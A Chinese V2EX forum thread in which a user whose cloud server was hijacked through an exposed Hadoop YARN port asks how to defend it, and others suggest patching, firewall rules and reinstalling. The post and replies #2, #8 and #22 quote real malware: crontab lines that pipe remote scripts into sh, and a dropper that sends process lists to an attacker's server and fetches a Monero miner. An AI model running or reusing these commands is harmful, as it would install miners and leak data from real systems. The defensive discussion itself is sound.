首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
Coding
V2EX  ›  Linux

攻击别人服务器是怎么搞的啊

  •  
  •   choice4 · 2018-10-13 22:52:36 +08:00 · 6563 次点击
    这是一个创建于 427 天前的主题,其中的信息可能已经有所发展或是发生改变。

    我都关了 root 登录 关闭了密码登录只允许秘钥登录 最后好像还是让某位大哥从 8088 进去了好像? cpu 100%(就是一个阿里云的学生机而已,这点性能也要搞我) crontab 里面给我加了个每秒执行的 wget ,

            • wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
              具体意思我就看不太懂了 就知道去给我 wget 下了一个脚本吧

    问问老哥们怎么防啊 。我去阿里云安全组设置规则端口地址段访问的时候说最多支持一组授权对象(离开家门之后网络就变了想有多个 ip 可以访问这个阿里云机器)。没搞好。 然后现在就是直接 firewall 把 8088 关了。20 分钟了还没出事。没关端口之前是 10~15 分钟 就会出问题。

    这个 firewall 和安全组能特定多个 ip 访问端口吗? 还有啊 有没有办法把这个搞我的地址弄出来啊 然后顺便加个排除他 ip 之类的

    34 回复  |  直到 2018-11-23 00:17:55 +08:00
        1
    WordTian   2018-10-13 22:55:30 +08:00 via Android
    cpu 百分百?那估计是挖矿脚本

    估计你在 8088 端口启的服务有漏洞
        2
    choice4   2018-10-13 22:59:28 +08:00
    #!/bin/bash

    ps ax --sort=-pcpu > /tmp/tmp2.txt
    #netstat -antp > /tmp/tmp2.txt
    #crontab -l > /tmp/tmp2.txt
    #ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
    #top -c -n 1 -b > /tmp/tmp.txt
    curl -F "[email protected]/tmp/tmp2.txt" http://46.249.38.186/rep.php
    rm -rf /tmp/tmp2.txt

    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
    LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
    LDR="wget -q -O -";
    fi

    if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
    then
    $LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
    else
    pwd
    fi


    这可能是那个脚本
        3
    choice4   2018-10-13 23:00:30 +08:00
    @WordTian 你好 请问有办法限制 ip 吗? 我搞了一会搞不好 直接关了 8088 我这边好多也不方便了
        4
    choice4   2018-10-13 23:01:16 +08:00   ♥ 1
    以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
    这会有点难受了
        5
    ech0x   2018-10-13 23:03:09 +08:00 via iPhone
    你是要跑什么东西?还是去好好补补安全常识吧,直接 0.0.0.0/0 也是心大。
        6
    t6attack   2018-10-13 23:07:38 +08:00
    有漏洞就抓紧补上。留着漏洞,只限 IP,这是什么操作?
        7
    watzds   2018-10-13 23:20:51 +08:00 via Android
    哈哈,这点性能也要搞我

    两年多前我遇到这种情况是因为 redis 没密码,看看有什么漏洞
        8
    WordTian   2018-10-13 23:29:31 +08:00 via Android
    https://bitbucket.org/okjh6t37/mygit/raw/master/x_64
    这个是实际执行的二进制文件,看着像门罗币的挖矿病毒 xmrig

    我之前开 aria2c 没设密钥的时候也中过一回类似的东西,你还是排查下对外开启的服务吧,看看有哪个可能有漏洞的,话说你 8088 开的什么服务啊

    限制 ip 的话,你先看看安全组有没相关的设置吧,有的话用那个就行。
    如果有经验的话,可以用 iptables。不行的话用 /etc 下的 host.allow,host.deny 也可以试试
        9
    choice4   2018-10-13 23:31:43 +08:00
    @WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞, 目前还在继续找解决办法
        10
    choice4   2018-10-13 23:32:13 +08:00
    @watzds 确实好像是一个服务有漏洞
        11
    zhexi   2018-10-14 00:25:06 +08:00 via Android
    iptables 或者 firewall 屏蔽不得行?
        12
    biglee0304   2018-10-14 00:41:20 +08:00 via iPhone
    看着的确是挖矿的
        13
    Greenm   2018-10-14 01:40:02 +08:00 via iPhone
    Hadoop yarn 吧,这个应该是未添加认证,可以直接执行的,加个口令或者限制在内网。
        14
    h3lica   2018-10-14 02:05:47 +08:00 via iPhone
    一般都是脚本刷漏洞的…别人也不是专门入侵你一个…
        15
    LeonKennedy   2018-10-14 08:42:02 +08:00
    曾经我每次 ssh 登陆上,好几千的失败登陆。后来我改了端口号,清净了
        16
    likuku   2018-10-14 10:32:08 +08:00 via iPhone
    @choice4 不是对外公有服务,那就 ssh is 端口外都关闭,需要访问其它服务,装平装 openvpn,或者 ssh 端口映射到本地。
        17
    choice4   2018-10-14 11:22:19 +08:00
    @likuku 就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录, 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ,后台的版本修复了 。但是我用的那个版本较低,还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢
        18
    likuku   2018-10-14 11:27:18 +08:00   ♥ 1
    @choice4 ssh 端口无所谓,只允许 key 认证 + 禁止 root 登陆就行了(个人观点),#18 我意思是 ss 之外其它端口干脆都禁掉,需要用的话,利用 openvpn (当然要仅对允许的访客 IP 开端口,当然要使用证书连接),或者 ssh 端口映射本地。

    另外,系统已经被爆(橘),受到污染的情况下,最好是备份好数据和能信任的干净配置信息前提下,干掉系统重装+更新+防火期 了事。
        19
    choice4   2018-10-14 11:31:47 +08:00
    @Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号
        20
    choice4   2018-10-14 11:31:58 +08:00
    @likuku
        21
    liangzi   2018-10-14 12:52:45 +08:00
    46.249.38.186 防火墙屏蔽一下不行吗?这个机器是”大便“的开 22 口了
        22
    hdonghong   2018-10-14 15:44:22 +08:00
    兄弟怎么解决的。。我也是 crontab 显示:*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

    终止后仍然是 cpu100%
        23
    realkenshinji   2018-10-14 16:34:28 +08:00 via iPhone
    @likuku 学习了
        24
    choice4   2018-10-14 17:53:36 +08:00
    @hdonghong 我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的 我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了 。再一步一步排查
        25
    forgetandnew   2018-10-15 01:39:20 +08:00 via iPhone
    ufw deny 8088
        26
    zyp0921   2018-10-15 08:50:49 +08:00
    iptables -A INPUT -j DROP
        27
    aloof   2018-10-15 09:35:49 +08:00
    阿里云的安全规则里面把所有端口全部关完。只开要使用的端口,然后服务器内部的 iptables 再针对已开端口做安全限制
        28
    choice4   2018-10-15 09:48:46 +08:00
    @aloof 8088 就是我要使用的端口 然后问题就是从这个端口上出的 。firewalld 和安全组我都是只开我自己用的。 但是那个 8088 上跑的程序有安全漏洞。被人黑了
        29
    opengps   2018-10-15 10:15:28 +08:00 via Android
    如果能确定是从 8088 入侵,那就是你这个程序有漏洞
    安全组,防火墙只是一道阀门,关闭端口而已,只属于防护
        30
    CoderGeek   2018-10-15 10:39:23 +08:00
    门罗币 hadoop 的漏洞 。 我之前也遭过
        31
    choice4   2018-10-15 10:54:59 +08:00
    @CoderGeek 请问你最后是怎么解决呢? 关死端口不太方便我这边。 伪分布式的。所有服务都是在这台机器启动的。 这会在琢磨弄一下一个叫 kerberos 安全认证的东西。看看能不能其效果。 分享一下经验吧谢谢
        32
    CoderGeek   2018-10-15 11:07:44 +08:00
    @choice4 备份数据 重装 升级 hadoop 版本 开启 kerberos 认证 google 上有解决方法
    我那个 留有后门 我清了 crontab 立马就会还原 又开始挖矿 我自己解决不了 只能选择重装了 = = 很伤
        33
    CoderGeek   2018-10-15 11:08:13 +08:00
    先去看版本吧 有几个版本都有这个问题
        34
    qwefdrt   2018-11-23 00:17:55 +08:00
    tcpdump 抓包把访问 8088 端口的 IP 抓出来,再用 firewall 禁止掉
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2195 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 37ms · UTC 05:21 · PVG 13:21 · LAX 21:21 · JFK 00:21
    ♥ Do have faith in what you're doing.